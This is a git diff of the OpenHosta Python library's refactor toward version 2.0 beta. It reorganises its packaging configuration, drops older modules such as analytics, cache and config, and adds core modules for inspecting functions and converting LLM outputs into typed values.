+If you encounter a problem, try these few method that may fix it:
+
+- Update pip: ``pip install --upgrade pip``
+- Use virtual environment
+- Try ``pip3`` instead of ``pip``
+- Use ``sudo`` (Unix) or run as administrator (Windows) if permission errors occur
+
+For more help and if the problem persist, please file an issue on GitHub.
diff --git a/pyproject.toml b/pyproject.toml
index fd7be4f..1ec95fb 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
[project]
name = "OpenHosta"
-version = "1.2.1"
+version = "2.0beta2"
description = "Open-Source programming project IA integretion in developement environnement"
keywords = ["AI", "GPT", "Natural language", "Autommatic", "Easy"]
authors = [
@@ -26,13 +26,34 @@ classifiers = [
"Topic :: Software Development :: Code Generators"
]
dependencies = [
- "requests>=2.32.3",
- "pydantic>=2.8.2",
- "tiktoken>=0.7.0",
- "jsonschema>=4.23.0",
- "typing-extensions>=4.12.2",
- "numpy>=2.1.1",
- "torch>=2.3.1"
+ "requests>=2.32.3"
+]
+
+[project.optional-dependencies]
+all = [
+ "pydantic>=2.8.2",
+ "torch>=2.5.1"
+]
+pydantic = [
+ "pydantic>=2.8.2"
+]
+dev = [
+ "mypy>=1.13.0",
+ "isort>=5.13.2",
+ "autopep8>=2.3.1",
+ "pylint>=3.3.1",
+ "pyflakes>=3.2.0",
+ "bandit>=1.7.10"
+]
+tests = [
+ "pytest>=8.3.2",
+ "pytest-cov>=5.0.0",
+ "pillow>=11.0.0",
+ "pydantic>=2.8.2",
+ "Flask>=3.0.3"
+]
+predict = [
+ "torch>=2.5.1"
]
[project.urls]
@@ -46,11 +67,24 @@ package-dir = { "" = "src" }
where = ["src"]
[tool.setuptools.package-data]
-"OpenHosta" = ["*.json"]
-
-[tool.pytest.ini_options]
-testpaths = [
- 'tests/functionnalTests',
- 'tests/unitTests',
- 'tests/performanceTests'
-]
\ No newline at end of file
+"OpenHosta" = ["utils/*.json"]
+
+[tool.bandit]
+skips = ["B112"]
+targets = ["src/OpenHosta"]
+recursive = true
+
+[tool.pylint]
+disable = [
+ "C0111",
+ "C0103",
+ "C0114",
+ "C0115",
+ "C0116",
+ "R0903",
+ "C0415"
+]
+max-line-length = 120
+
+[tool.mypy]
+disable_error_code = ["attr-defined"]
\ No newline at end of file
diff --git a/src/.gitignore b/src/.gitignore
deleted file mode 100644
index cf1e07b..0000000
--- a/src/.gitignore
+++ /dev/null
@@ -1,1 +0,0 @@
-OpenHosta.egg-info/*
\ No newline at end of file
diff --git a/src/OpenHosta/OpenHosta.py b/src/OpenHosta/OpenHosta.py
index 762efae..2d40c68 100644
--- a/src/OpenHosta/OpenHosta.py
+++ b/src/OpenHosta/OpenHosta.py
@@ -1,32 +1,44 @@
-from .config import Model, DefaultManager
+from __future__ import annotations
+from .exec.ask import ask
+from .exec.predict.model import ArchitectureType
+from .exec.predict.predict_config import PredictConfig
+from .exec.predict.predict import predict
+from .utils.meta_prompt import EMULATE_PROMPT
+from .exec.thinkof import thinkof
+from .exec.thought import thought
+from .exec.example import example
+from .exec.emulate import emulate
+from .core import config
+from .core.config import Model, DefaultManager
+from .utils.meta_prompt import print_last_prompt
+
+import os
DefaultManager.set_default_model(
- Model(model="gpt-4o", base_url="https://api.openai.com/v1/chat/completions")
+ Model(model="gpt-4o", base_url="https://api.openai.com/v1/chat/completions",
+ api_key=os.getenv("OPENAI_API_KEY") or None)
)
-from .emulate import _exec_emulate
-from .predict import _exec_predict
-from .trainset import TrainingSet
-from . import config
-from .thought import thought
-from .exec import HostaInjector
-from .example import example, save_examples, load_training_example
-from .enhancer import suggest
-
-emulate = HostaInjector(_exec_emulate)
-predict = HostaInjector(_exec_predict)
+from .core import config
+from .exec.emulate import emulate
+from .exec.example import example
+from .exec.thought import thought
+from .exec.thinkof import thinkof
+from .exec.predict.predict import predict
+from .exec.predict.predict_config import PredictConfig
+from .exec.predict.model import ArchitectureType
+from .exec.ask import ask
-__all__ = (
+all = (
+ "config",
"emulate",
"thought",
- "example",
- "save_examples",
- "load_training_example",
- "TrainingSet",
- "config",
- "Model",
- "DefaultManager",
- "suggest",
- "predict"
+ "example",
+ "thinkof",
+ "ask",
+ "EMULATE_PROMPT",
+ "predict",
+ "ModelSchema",
+ "ArchitectureType",
+ "print_last_prompt"
)
-
diff --git a/src/OpenHosta/__init__.py b/src/OpenHosta/__init__.py
index da9ccef..4f70251 100644
--- a/src/OpenHosta/__init__.py
+++ b/src/OpenHosta/__init__.py
@@ -1,3 +1,3 @@
from .OpenHosta import *
-__version__ = "1.2.1"
+__version__ = "2.0-beta1"
diff --git a/src/OpenHosta/analytics.py b/src/OpenHosta/analytics.py
deleted file mode 100644
index 9b59686..0000000
--- a/src/OpenHosta/analytics.py
+++ /dev/null
@@ -1,127 +0,0 @@
-import tiktoken
-from enum import Enum
-import time as t
-import sys
-import json
-
-from .config import Model, DefaultManager
-from .prompt import PromptMananger
-
-_x = PromptMananger()
-
-_estimate_prompt = _x.get_prompt("estimate")
-
-l_default = DefaultManager.get_default_model()
-
-
-class ModelAnalizer(Model):
-
- _default_input_cost: int = 0.005
- _default_output_cost: int = 0.015
- _default_token_perSec = 63.32
- _default_latency = 0.48
-
- def __init__(
- self,
- name: str,
- input_cost: float,
- output_cost: float,
- latency: float,
- token_perSec: float,
- ):
- self.name = self._default_name if name is None else name
- self.input_cost = self._default_input_cost if input_cost is None else input_cost
- self.output_cost = (
- self._default_output_cost if output_cost is None else output_cost
- )
- self.latency = self._default_latency if latency is None else latency
- self.token_perSec = (
- self._default_token_perSec if token_perSec is None else token_perSec
- )
- self.tokenizer = tiktoken.get_encoding("cl100k_base")
-
- def get_input_cost(self):
- return self.input_cost
-
- def get_output_cost(self):
- return self.output_cost
-
- def get_latency(self):
- return self.latency
-
- def get_token_perSec(self):
- return self.token_perSec
-
- def _estimate_output_token(self, function_doc: str, function_call: str):
- global _estimate_prompt, l_default
-
- try:
- if not _estimate_prompt:
- raise ValueError("ValueError -> emulate empty values")
- except ValueError as v:
- sys.stderr.write(f"[ESTIMATE_ERROR]: {v}")
- return None
-
- l_user_prompt = (
- "\n Here's the fonction documentation:\n"
- + f"{function_doc}\n"
- + "Here's the function call:\n"
- + f"{function_call}\n"
- )
-
- response = l_default._api_call(
- sys_prompt=_estimate_prompt,
- user_prompt=l_user_prompt,
- creativity=0.2,
- diversity=0.2,
- )
-
- if response.status_code == 200:
- data = response.json()
- json_string = data["choices"][0]["message"]["content"]
- try:
- l_ret_data = json.loads(json_string)
-
- except json.JSONDecodeError as e:
- sys.stderr.write(f"JSONDecodeError: {e}")
- l_cleand = "\n".join(json_string.split("\n")[1:-1])
- l_ret_data = json.loads(l_cleand)
-
- l_ret = l_ret_data["tokens"]
- else:
- sys.stderr.write(f"Error {response.status_code}: {response.text}")
- l_ret = None
-
- return l_ret
-
- def _compute_request_cost(self, input_text, output_token):
- input_tokens = self.tokenizer.encode(input_text)
- num_input_tokens = len(input_tokens)
- num_output_tokens = output_token
- cost_input = (num_input_tokens / 1000) * self.input_cost
- cost_output = (num_output_tokens / 1000) * self.output_cost
- total_cost = cost_input + cost_output
- return total_cost
-
- def _compute_request_duration(self, output_token):
- total = self.latency
- total += self.token_perSec / output_token
- total += 0.5 # Processing duration margin
- return total
-
-
-def request_timer(func):
- def wrapper(*args, **kwargs):
- g_c = "\033[94m"
- n = "\033[0m"
- bold = "\033[1m"
-
- start = t.time()
- rv = func(*args, **kwargs)
- end = t.time()
-
- duration = end - start
- print(f"{g_c}{bold}Execution time of {func.__name__}: {duration:.2f}s{n}")
- return rv
-
- return wrapper
diff --git a/src/OpenHosta/build.py b/src/OpenHosta/build.py
deleted file mode 100644
index 9b56069..0000000
--- a/src/OpenHosta/build.py
+++ /dev/null
@@ -1,10 +0,0 @@
-from .config import Model, DefaultManager
-
-def _exec_build(
- _function_infos : dict = None,
- _function_obj: object = None,
- model: Model = None,
-
-):
- pass
-
diff --git a/src/OpenHosta/builder.py b/src/OpenHosta/builder.py
deleted file mode 100644
index 304e9dd..0000000
--- a/src/OpenHosta/builder.py
+++ /dev/null
@@ -1,57 +0,0 @@
-import json
-import os
-import torch
-
-from .model import CustomLinearModel
-
-class Builder():
- def __init__(self, hidden_dir):
-
- self.hidden_dir = hidden_dir
-
-
- def build(self, len_input, len_output, complexity, config, optimizer, loss):
- assert len_input > 0, "Input size must be greater than 0"
- assert len_output > 0, "Output size must be greater than 0"
-
- if complexity == None:
- complexity = 5
- if optimizer != None:
- print("\033[93mWarning: The change of optimizer is not available for now, AdamW is actually used.\033[0m")
- optimizer = "AdamW"
- if loss != None:
- print("\033[93mWarning: The change of loss are not available for now, Smooth1Loss is actually used.\033[0m")
- loss = "SmoothL1Loss"
-
- if config == None:
- config = {
- "architecture": "LinearRegression",
- "input_size": len_input,
- "hidden_size_1": len_input * (2 * complexity),
- "hidden_size_2": len_input * (4 * complexity),
- "hidden_size_3": len_input * (2 * complexity),
- "output_size": len_output,
- "optimizer": optimizer,
- "loss": loss
- }
-
- config_json = json.dumps(config)
- config_path = os.path.join(self.hidden_dir, "config.json")
-
- with open(config_path, "w") as f:
- f.write(config_json)
- return config["architecture"]
-
- def load_inference(self, config_path, weight_path, inference):
- with open(config_path, "r") as file:
- config = json.load(file)
-
- model = CustomLinearModel(config, self.hidden_dir)
- model.load_state_dict(torch.load(weight_path, weights_only=True))
- output = model.forward(inference)
- return output
-
- def trains(self, config, train, val, epochs, verbose, get_loss, continue_training):
-
- model = CustomLinearModel(config, self.hidden_dir)
- model.train(train, val, epochs, self.hidden_dir, verbose, get_loss, continue_training)
diff --git a/src/OpenHosta/cache.py b/src/OpenHosta/cache.py
deleted file mode 100644
index 23896c5..0000000
--- a/src/OpenHosta/cache.py
+++ /dev/null
@@ -1,200 +0,0 @@
-import pickle
-import os
-import hashlib
-import inspect
-from typing import Callable, Dict, Any, get_origin, get_args
-import typing
-import collections
-from pydantic import BaseModel, create_model
-
-
-CACHE_DIR = "__hostacache__"
-os.makedirs(CACHE_DIR, exist_ok=True)
-
-
-class Hostacache:
- def __init__(self, func, cache_id=None, value=None) -> None:
- self.func = func
- self.cache_id = cache_id
- self.value = value
- self.infos_cache = {
- "hash_function": "",
- "function_def": "",
- "return_type": "",
- "return_caller": "",
- "function_call": "",
- "function_args": {},
- "function_locals": {},
- "ho_example": [],
- "ho_example_id": 0,
- "ho_example_links": [],
- "ho_cothougt": [],
- "ho_cothougt_id": 0,
- "ho_data": [],
- "ho_data_id": 0,
- }
-
- def create_hosta_cache(self):
- func_name = self.func.__name__
- path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
-
- if self.cache_id is None:
- if os.path.exists(path_name):
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
- return cached_data
- else:
- return self._parse_and_create_cache_file(path_name)
-
- if os.path.exists(path_name):
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
- assert self.cache_id in cached_data, "Cache ID not found in cache file"
- if self.value is not None:
- if not self._is_value_already_in_example(self.value, cached_data):
- cached_data[str(self.cache_id)].append(self.value)
- cached_data[f"{str(self.cache_id)}_id"] = self._get_hashFunction(
- str(cached_data[str(self.cache_id)]), 0, 0
- )
- cached_data["hash_function"] = self._get_hashFunction(
- cached_data["function_def"],
- cached_data["ho_example_id"],
- cached_data["ho_cothougt_id"],
- )
- with open(path_name, "wb") as f:
- pickle.dump(cached_data, f)
-
- return cached_data
-
- return self._parse_and_create_cache_file(path_name)
-
- def _parse_and_create_cache_file(self, path_name):
- """ When cache_id is None or cache doesn't exist, create a cache just for function metadata """
- hosta_args = self._get_argsFunction(self.func)
- with open(path_name, "wb") as f:
- pickle.dump(hosta_args, f)
- return hosta_args
-
- def _get_argsFunction(self, func_obj):
- self.infos_cache["function_def"], func_prot = self._get_functionDef(func_obj)
- self.infos_cache["return_type"], self.infos_cache["return_caller"] = (
- self._get_functionReturnType(func_obj)
- )
-
- if self.cache_id is not None and self.value is not None:
- if self.cache_id in self.infos_cache:
- self.infos_cache[self.cache_id].append(self.value)
- else:
- self.infos_cache[self.cache_id] = [self.value]
-
- self.infos_cache[f"{self.cache_id}_id"] = self._get_hashFunction(
- str(self.infos_cache[self.cache_id]), 0, 0
- )
-
- self.infos_cache["hash_function"] = self._get_hashFunction(
- self.infos_cache["function_def"],
- self.infos_cache["ho_example_id"],
- self.infos_cache["ho_cothougt_id"],
- )
- return self.infos_cache
-
- def _is_value_already_in_example(self, value, cached_data):
- if self.cache_id not in cached_data:
- print("Cache ID not found in cache file")
- return False
-
- def recursive_check(item, value):
- if isinstance(item, dict):
- if item == value or any(recursive_check(v, value) for v in item.values()):
- return True
- elif isinstance(item, list):
- return any(recursive_check(sub_item, value) for sub_item in item)
- else:
- return item == value
-
- for item in cached_data[self.cache_id]:
- if recursive_check(item, value):
- return True
- return False
-
- def _get_hashFunction(self, func_def: str, nb_example: int, nb_thought: int) -> str:
- combined = f"{func_def}{nb_example}{nb_thought}"
- return hashlib.md5(combined.encode()).hexdigest()
-
- def _get_functionDef(self, func: Callable) -> str:
- sig = inspect.signature(func)
-
- func_name = func.__name__
- func_params = ", ".join(
- [
- (
- f"{param_name}: {param.annotation.__name__}"
- if param.annotation != inspect.Parameter.empty
- else param_name
- )
- for param_name, param in sig.parameters.items()
- ]
- )
- func_return = (
- f" -> {sig.return_annotation.__name__}"
- if sig.return_annotation != inspect.Signature.empty
- else ""
- )
- definition = (
- f"```python\ndef {func_name}({func_params}):{func_return}\n"
- f" \"\"\"\n\t{func.__doc__}\n \"\"\"\n```"
- )
- prototype = f"def {func_name}({func_params}):{func_return}"
- return definition, prototype
-
- def _inspect_returnType(self, func: Callable) -> str:
- sig = inspect.signature(func)
-
- if sig.return_annotation != inspect.Signature.empty:
- return sig.return_annotation
- else:
- return None
-
- def _get_typingOrigin(self, return_type) -> bool:
- origin = get_origin(return_type)
- return origin in {
- list,
- dict,
- tuple,
- set,
- frozenset,
- typing.Union,
- typing.Optional,
- typing.Literal,
- collections.deque,
- collections.abc.Iterable,
- collections.abc.Sequence,
- collections.abc.Mapping,
- }
-
- def _get_functionReturnType(self, func: Callable) -> Dict[str, Any]:
- return_caller = self._inspect_returnType(func)
- return_type = None
-
- if return_caller is not None:
- if self._get_typingOrigin(return_caller):
- return_caller_origin = get_origin(return_caller)
- return_caller_args = get_args(return_caller)
- combined = return_caller_origin[return_caller_args]
- new_model = create_model(
- "Hosta_return_shema", return_hosta_type_typing=(combined, ...)
- )
- return_type = new_model.model_json_schema()
- elif issubclass(return_caller, BaseModel):
- return_type = return_caller.model_json_schema()
- else:
- new_model = create_model(
- "Hosta_return_shema", return_hosta_type=(return_caller, ...)
- )
- return_type = new_model.model_json_schema()
- else:
- No_return_specified = create_model(
- "Hosta_return_shema", return_hosta_type_any=(Any, ...)
- )
- return_type = No_return_specified.model_json_schema()
- return return_type, return_caller
\ No newline at end of file
diff --git a/src/OpenHosta/config.py b/src/OpenHosta/config.py
deleted file mode 100644
index 2546623..0000000
--- a/src/OpenHosta/config.py
+++ /dev/null
@@ -1,202 +0,0 @@
-import sys
-import requests
-import json
-import re
-from jsonschema import validate
-from pydantic import BaseModel
-from typing import get_origin, get_args
-
-from .errors import ApiKeyError
-
-
-def is_valid_url(url):
- regex = re.compile(
- r"^(?:http|ftp)s?://"
- r"(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|"
- r"localhost|"
- r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|"
- r"\[?[A-F0-9]*:[A-F0-9:]+\]?)"
- r"(?::\d+)?"
- r"(?:/?|[/?]\S+)$",
- re.IGNORECASE,
- )
- return re.match(regex, url) is not None
-
-
-class Model:
-
- _SYS_PROMPT = ""
-
- def __init__(self, model: str = None, base_url: str = None, api_key: str = None):
- self.model = model
- self.base_url = base_url
- self.api_key = api_key
- self._last_request = None
-
- self.conversion_function = {
- str: lambda x: str(x),
- int: lambda x: int(x),
- float: lambda x: float(x),
- list: lambda x: list(x),
- set: lambda x: set(x),
- frozenset: lambda x: frozenset(x),
- tuple: lambda x: tuple(x),
- bool: lambda x: bool(x),
- type(None): lambda x: None,
- }
-
- if any(var is None for var in (model, base_url)):
- sys.stderr.write(f"[CONFIG_ERROR] Empty values.")
- return
- elif not is_valid_url(self.base_url):
- sys.stderr.write(f"[CONFIG_ERROR] Invalid URL.")
- return
-
- def __str__(self) -> str:
- return (
- f"[OpenHosta] <{self.__class__.__module__}.{self.__class__.__name__} object at {hex(id(self))}>\n"
- f"Model: {self.model}\n"
- f"Base_url: {self.base_url}\n"
- "Infos:\n"
- )
-
- def api_call(
- self, sys_prompt: str, user_prompt: str, creativity: float, diversity: float
- )->requests.models.Response:
- if self.api_key is None or not self.api_key:
- raise ApiKeyError("Empty API key.")
-
- l_body = {
- "model": self.model,
- "messages": [
- {
- "role": "system",
- "content": [{"type": "text", "text": sys_prompt}],
- },
- {
- "role": "user",
- "content": [{"type": "text", "text": user_prompt}],
- },
- ],
- "response_format": {"type": "json_object"},
- "temperature": creativity if creativity is not None else 0.7,
- "top_p": diversity if diversity is not None else 0.7,
- }
- headers = {
- "Content-Type": "application/json",
- "Authorization": f"Bearer {self.api_key}",
- }
- self._last_request = l_body
-
- try:
- response = requests.post(self.base_url, json=l_body, headers=headers)
- response.raise_for_status()
- except requests.exceptions.RequestException as e:
- sys.stderr.write(f"\n[CALL_ERROR] Request failed:\n{e}\n\n")
- if response.status_code != 200:
- if "invalid_api_key" in str(response.text):
- raise ApiKeyError("Incorrect API key.")
- else:
- sys.stderr.write(f"[CALL_ERROR] API call was unsuccessful.\nStatus code: {response.status_code}:\n{response.text}")
- return response
-
- def request_handler(self, response, return_type, return_caller):
- l_ret = None
-
- data = response.json()
- json_string = data["choices"][0]["message"]["content"]
-
- try:
- l_ret_data = json.loads(json_string)
- # validate(
- # instance=l_ret_data.get("return", {}),
- # schema=return_type.get("properties", {}),
- # ) # REFACTO
- except json.JSONDecodeError as e:
- sys.stderr.write(f"JSONDecodeError: {e}")
- l_cleand = "\n".join(json_string.split("\n")[1:-1])
- l_ret_data = json.loads(l_cleand)
- l_ret = l_ret_data["return"]
- return l_ret
-
- if "return_hosta_type" in return_type["properties"]:
- if return_caller in self.conversion_function:
- convert_function = self.conversion_function[return_caller]
- if l_ret_data["return"] is not None:
- l_ret = convert_function(l_ret_data["return"])
- else:
- l_ret = l_ret_data["return"]
-
- elif "return_hosta_type_typing" in return_type["properties"]:
- l_ret = self.convert_to_type(l_ret_data["return"], return_caller)
-
- elif "return_hosta_type_any" in return_type["properties"]:
- l_ret = l_ret_data["return"]
-
- elif issubclass(return_caller, BaseModel):
- try:
- l_ret = return_caller(**l_ret_data["return"])
- except:
- sys.stderr.write("Unable t parse answer: ", l_ret_data["return"])
- for m in self.__last_request["messages"]:
- sys.stderr.write(" "+m["role"]+">\n=======\n", m["content"][0]["text"])
- sys.stderr.write("Answer>\n=======\n", l_ret_data["return"])
- l_ret = None
-
- else:
- l_ret = l_ret_data["return"]
-
- return l_ret
-
- def convert_to_type(self, data, type):
- origin = get_origin(type)
- args = get_args(type)
-
- if origin != None:
- if origin in self.conversion_function:
- convert_function = self.conversion_function[origin]
- return convert_function(self.convert_to_type(d, args[0]) for d in data)
-
- return data
-
-
-class DefaultModel:
- _instance = None
-
- def __new__(cls, *args, **kwargs):
- if cls._instance is None:
- cls._instance = super(DefaultModel, cls).__new__(cls, *args, **kwargs)
- return cls._instance
-
- def __init__(self):
- if not hasattr(self, "model"):
- self.model = None
-
- def set_default_model(self, new):
- if isinstance(new, Model):
- self.model = new
- else:
- sys.stderr.write("[CONFIG_ERROR] Invalid model instance.\n")
-
- def set_default_apiKey(self, api_key=None):
- if api_key is not None or isinstance(api_key, str):
- self.model.api_key = api_key
- else:
- sys.stderr.write("[CONFIG_ERROR] Invalid API key.")
-
- def get_default_model(self):
- return self.model
-
-
-DefaultManager = DefaultModel()
-
-
-def set_default_model(new):
- DefaultManager.set_default_model(new)
-
-
-def set_default_apiKey(api_key=None):
- DefaultManager.set_default_apiKey(api_key)
-
-
-__all__ = Model, set_default_apiKey, set_default_model, DefaultManager
diff --git a/src/OpenHosta/core/__init__.py b/src/OpenHosta/core/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/core/analizer.py b/src/OpenHosta/core/analizer.py
new file mode 100644
index 0000000..127d95e
--- /dev/null
+++ b/src/OpenHosta/core/analizer.py
@@ -0,0 +1,295 @@
+from __future__ import annotations
+
+from typing import (
+ Any,
+ Dict,
+ get_args,
+ get_origin,
+ Union,
+ List,
+ Tuple,
+ Mapping,
+ Sequence,
+ Collection,
+ Literal,
+ Final,
+ Type,
+ Annotated,
+ ClassVar,
+ Protocol,
+ AnyStr,
+ ByteString,
+ Set,
+ FrozenSet,
+ AbstractSet,
+ Optional,
+ Callable,
+ OrderedDict,
+ TypeVar
+)
+from types import MethodType, NoneType
+import inspect
+from types import FrameType
+from typing import Callable, Tuple, List, Dict, Any, Optional, Type
+
+from ..utils.import_handler import is_pydantic
+
+all = (
+ "FuncAnalizer"
+)
+
+
+class FuncAnalizer:
+ """
+ A class for inspecting the signature, definition, and call information of a function.
+
+ Args:
+ func (Callable): The function to inspect.
+
+ Attributes:
+ func (Callable): The function to inspect.
+ sig (Signature): The signature of the function.
+ """
+
+ def __init__(self, func: Union[Callable, MethodType] | None, caller_frame: FrameType | None):
+ """
+ Initialize the function inspector with the given function.
+
+ Args:
+ func (Callable): The function to inspect.
+ caller_frame (FrameType): The function's frame in which it is called.
+ """
+ try:
+ self.func = func
+ self.sig = inspect.signature(func)
+ _, _, _, self.values = inspect.getargvalues(caller_frame)
+ except Exception as e:
+ raise AttributeError(
+ f"[_FuncInspector.__init__] Invalid arguments:\n{e}")
+
+ @property
+ def func_def(self) -> str:
+ """
+ Build the string representing the function's definition.
+
+ Returns:
+ The string representing the function's definition.
+ """
+ func_name = self.func.__name__
+ func_params = ", ".join(
+ [
+ (
+ f"{param_name}: {param.annotation.__name__}"
+ if param.annotation != inspect.Parameter.empty
+ else param_name
+ )
+ for param_name, param in self.sig.parameters.items()
+ ]
+ )
+ func_return = (
+ f" -> {self.sig.return_annotation.__name__}"
+ if self.sig.return_annotation != inspect.Signature.empty
+ else ""
+ )
+ definition = (
+ f"```python\ndef {func_name}({func_params}):{func_return}\n"
+ f" \"\"\"\n\t{self.func.__doc__}\n \"\"\"\n```"
+ )
+ return definition
+
+ @property
+ def func_locals(self) -> Tuple[Optional[Dict[str, Any]], Any]:
+ """
+ Get the attributs and local variables of the function call.
+
+ Returns:
+ A tuple containing the bound arguments, local variables, and local attributs.
+ """
+ values_locals = {k: v for k, v in self.values.items()
+ if k not in self.sig.parameters}
+ values_locals.pop('self', None)
+
+ values_self = None
+ if hasattr(self.func, '__self__'):
+ values_self = getattr(self.func.__self__, '__dict__', None)
+ return values_locals or None, values_self
+
+ @property
+ def func_call(self) -> Tuple[str, OrderedDict[str, Any]]:
+ """
+ Build a string representing the function call.
+
+ Returns:
+ A tuple containing a string representing the function call and the bound arguments.
+ """
+ values_args = {k: v for k, v in self.values.items()
+ if k in self.sig.parameters}
+
+ bound_args = self.sig.bind_partial(**values_args)
+ bound_args.apply_defaults()
+
+ bound_arguments = bound_args.arguments
+
+ args_str = ", ".join(
+ f"{k}={v!r}" for k, v in bound_arguments.items()
+ )
+ call_str = f"{self.func.__name__}({args_str})"
+ return call_str, bound_arguments
+
+ @property
+ def func_type(self) -> Tuple[List[Any], Any]:
+ """
+ Get the _inputs and _outputs types of the function.
+
+ Returns:
+ A tuple containing the _inputs types and _outputs type.
+ """
+ input_types = [
+ param.annotation for param in self.sig.parameters.values()
+ ]
+ output_type = self.sig.return_annotation if self.sig.return_annotation != inspect.Signature.empty else None
+ return input_types, output_type
+
+ def _get_type_schema(self, tp: Any) -> Dict[str, Any]:
+ """
+ Generate a JSON schema for a given type.
+
+ Args:
+ tp: The type to generate the schema for.
+
+ Returns:
+ The JSON schema for the type.
+ """
+ if tp == Any:
+ return {"type": "any"}
+
+ origin = get_origin(tp)
+ args = get_args(tp)
+
+ if origin in (Union, Optional):
+ if len(args) == 2 and (NoneType in args or type(None) in args):
+ main_type = args[0] if args[1] in (
+ NoneType, type(None)) else args[1]
+ return {
+ "anyOf": [
+ self._get_type_schema(main_type),
+ {"type": "null"}
+ ]
+ }
+ return {"anyOf": [self._get_type_schema(arg) for arg in args]}
+
+ if origin in (list, List, Sequence, Collection):
+ return {
+ "type": "array",
+ "items": self._get_type_schema(args[0]) if args else {"type": "any"}
+ }
+
+ if origin in (dict, Dict, Mapping):
+ return {
+ "type": "object",
+ "additionalProperties": self._get_type_schema(args[1]) if args else {"type": "any"}
+ }
+
+ if origin is Final:
+ return self._get_type_schema(args[0]) if args else {"type": "any"}
+
+ if origin is Type:
+ return {"type": "object", "format": "type"}
+
+ if origin is ClassVar:
+ return self._get_type_schema(args[0]) if args else {"type": "any"}
+
+ if origin is Annotated:
+ return self._get_type_schema(args[0])
+
+ if origin is Literal:
+ return {"enum": list(args)}
+
+ if origin in (tuple, Tuple):
+ if len(args) == 2 and args[1] is ...:
+ return {
+ "type": "array",
+ "items": self._get_type_schema(args[0])
+ }
+ return {
+ "type": "array",
+ "prefixItems": [self._get_type_schema(arg) for arg in args],
+ "items": False
+ }
+
+ if origin in (set, Set, frozenset, FrozenSet, AbstractSet):
+ return {
+ "type": "array",
+ "uniqueItems": True,
+ "items": self._get_type_schema(args[0]) if args else {"type": "any"}
+ }
+
+ if hasattr(tp, "__annotations__") and isinstance(tp, type) and hasattr(tp, "__total__"):
+ properties = {
+ key: self._get_type_schema(value)
+ for key, value in tp.__annotations__.items()
+ }
+ required = [key for key in properties.keys()] if getattr(
+ tp, "__total__", True) else []
+ return {
+ "type": "object",
+ "properties": properties,
+ "required": required,
+ "additionalProperties": False
+ }
+
+ if isinstance(tp, TypeVar):
+ if tp.__constraints__:
+ return {
+ "anyOf": [
+ self._get_type_schema(constraint)
+ for constraint in tp.__constraints__
+ ]
+ }
+ elif tp.__bound__:
+ return self._get_type_schema(tp.__bound__)
+ else:
+ return {"type": "any"}
+
+ if isinstance(tp, type) and issubclass(tp, Protocol):
+ return {"type": "object", "format": "protocol"}
+
+ if tp is int:
+ return {"type": "integer"}
+ if tp is float:
+ return {"type": "number"}
+ if tp is str or tp is AnyStr:
+ return {"type": "string"}
+ if tp is list:
+ return {"type": "list"}
+ if tp is dict:
+ return {"type": "dict"}
+ if tp is bool:
+ return {"type": "boolean"}
+ if tp is NoneType or tp is None:
+ return {"type": "null"}
+ if tp is bytes or tp is bytearray or tp is ByteString:
+ return {"type": "string", "format": "binary"}
+
+ raise ValueError(f"[_get_type_schema] Unsupported type: {tp}")
+
+ @property
+ def func_schema(self) -> Dict[str, Any]:
+ """
+ Get the JSON schema of the function's return type.
+
+ Returns:
+ The JSON schema of the function's return type.
+ """
+ return_caller = self.sig.return_annotation if self.sig.return_annotation != inspect.Signature.empty else None
+
+ if return_caller is not None:
+ if is_pydantic:
+ from .pydantic_usage import get_pydantic_schema
+
+ pyd_sch = get_pydantic_schema(return_caller)
+ if pyd_sch is not None:
+ return pyd_sch
+ return self._get_type_schema(return_caller)
+ else:
+ return self._get_type_schema(Any)
diff --git a/src/OpenHosta/core/checker.py b/src/OpenHosta/core/checker.py
new file mode 100644
index 0000000..633af28
--- /dev/null
+++ b/src/OpenHosta/core/checker.py
@@ -0,0 +1,114 @@
+from __future__ import annotations
+
+from types import NoneType
+from typing import Type, Any, Dict, Optional, Callable, TypeVar
+
+from .hosta import Func
+from ..utils.import_handler import is_pydantic
+
+T = TypeVar('T')
+
+
+class HostaChecker:
+ """
+ A class used to check and convert the _outputs of a Language Model (LLM) to the type specified in a function's annotation.
+
+ Args:
+ func (Func): A function object that contains the type annotations for the LLM _outputs.
+ data (dict): A dictionary containing the LLM _outputs data to be checked and converted.
+
+ Attributes:
+ func (Func): The function object containing the type annotations for the LLM _outputs.
+ data (dict): The LLM _outputs data to be checked and converted.
+ checked (Any): The checked and converted data. If `data` contains a "return" key, its value is used as the checked data. Otherwise, `data` is used as the checked data.
+ is_passed (bool): A flag indicating whether the checked data should be converted or not. It is set to True if `data` contains a "return" key.
+ """
+
+ def __init__(self, func: Func, data: dict):
+ self.func = func
+ self.data = data
+ try:
+ self.checked = self.data["return"]
+ self.is_passed = True
+ except KeyError:
+ self.checked = self.data
+ self.is_passed = False
+
+ def _default(self, x: Any) -> Any:
+ """
+ A default conversion function that returns the _inputs as is.
+
+ Args:
+ x (Any): The _inputs data to be converted.
+
+ Returns:
+ Any: The _inputs data as is.
+ """
+ return x
+
+ def convert(self, typ: Type[T]) -> Dict[Type[T], Optional[Callable[[Any], T]]]:
+ """
+ A method to create a conversion function for a given type.
+
+ Args:
+ typ (Type[T]): The type for which a conversion function needs to be created.
+
+ Returns:
+ Dict[Type[T], Optional[Callable[[Any], T]]]: A dictionary mapping types to their corresponding conversion functions.
+ """
+ convertMap = {
+ NoneType: lambda x: None,
+ str: lambda x: str(x),
+ int: lambda x: int(x),
+ float: lambda x: float(x),
+ list: lambda x: list(x),
+ set: lambda x: set(x),
+ frozenset: lambda x: frozenset(x),
+ tuple: lambda x: tuple(x),
+ bool: lambda x: bool(x),
+ dict: lambda x: dict(x),
+ complex: lambda x: complex(x),
+ bytes: lambda x: bytes(x),
+ }
+ if typ not in convertMap.keys():
+ return self._default.__func__
+ return convertMap[typ]
+
+ def convert_annotated(self) -> Any:
+ """
+ A method to convert the checked data based on the type annotations of the function.
+
+ Returns:
+ Any: The converted checked data based on the type annotations.
+ """
